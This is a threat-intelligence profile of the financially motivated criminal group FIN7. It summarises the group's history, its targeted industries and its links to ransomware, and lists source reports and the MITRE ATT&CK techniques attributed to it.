FIN7
| Actor Type | Criminal Group |
|---|---|
| Affiliated Intrusion Sets | ALPHV Blackcat Ransomware Group |
FIN7 is a criminal, financially motivated group which Mandiant has tracked since 2015 and which shows overlaps with the Carbanak Group.
The group has targeted over 100 organizations, initially focusing on stealing payment card data. Their operations subsequently extended beyond card data theft, including attacks on finance departments within victim organizations. In April 2017, they sent spear-phishing emails to personnel involved in United States Securities and Exchange Commission (SEC) filings, indicating an interest in material non-public information for potential stock trading advantage.
Their innovation and social engineering prowess have allowed them to impact diverse industries, including restaurants, travel, hospitality, education, casinos, gaming, construction, energy, retail, finance, telecommunications, high-tech, government, software, and business services.
Over time, their TTPs have evolved and more recent reporting has linked the group to ransomware intrusions.
Cyber Threat Graph Context
Explore how this Intrusion Set relates to the wider threat graph
FIN7 Threat Reports
Threat Group FIN7 Targets the U.S. Automotive Industry
In late 2023, BlackBerry analysts discovered a targeted attack by FIN7 on a U.S. automotive manufacturer, exploiting IT employees with higher ...
References
www.mandiant.com
https://www.mandiant.com/resources/blog/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operationwww.mandiant.com
https://www.mandiant.com/resources/blog/evolution-of-fin7www.mandiant.com
https://www.mandiant.com/resources/blog/mahalo-fin7-responding-to-new-tools-and-techniqueswww.mandiant.com
https://www.mandiant.com/resources/blog/fin7-phishing-lnkblogs.blackberry.com
https://blogs.blackberry.com/en/2024/04/fin7-targets-the-united-states-automotive-industrywww.mandiant.com
https://www.mandiant.com/resources/blog/fin7-spear-phishing-campaign-targets-personnel-involved-sec-filingsMITRE ATT&CK Techniques
MITRE ATT&CK techniques observed in use by this intrusion set.
| ATT&CK ID | Title | Associated Tactics |
|---|---|---|
| T1057 | Process Discovery | Discovery |
| T1087.002 | Domain Account | Discovery |
| T1059.001 | PowerShell | Execution |
| T1562.004 | Disable or Modify System Firewall | Defense Evasion |
| T1090 | Proxy | Command and Control |
| T1543.003 | Windows Service | Persistence, Privilege Escalation |
| T1566.002 | Spearphishing Link | Initial Access |
| T1608.005 | Link Target | Resource Development |
| T1069.002 | Domain Groups | Discovery |
| T1564.001 | Hidden Files and Directories | Defense Evasion |
| T1027 | Obfuscated Files or Information | Defense Evasion |
| T1204.002 | Malicious File | Execution |
| T1583.001 | Domains | Resource Development |
| T1041 | Exfiltration Over C2 Channel | Exfiltration |
| T1124 | System Time Discovery | Discovery |
| T1033 | System Owner/User Discovery | Discovery |
| T1053.005 | Scheduled Task | Execution, Persistence, Privilege Escalation |
| T1082 | System Information Discovery | Discovery |